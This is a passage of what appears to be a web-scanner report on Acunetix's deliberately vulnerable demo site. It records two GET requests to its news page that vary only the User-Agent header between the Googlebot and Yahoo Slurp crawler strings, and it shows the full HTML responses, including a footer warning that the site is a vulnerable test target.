href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Show / hide Request and Response
Request Header - size: 450 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:25 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Show / hide Request and Response
Request Header - size: 461 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:26 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a 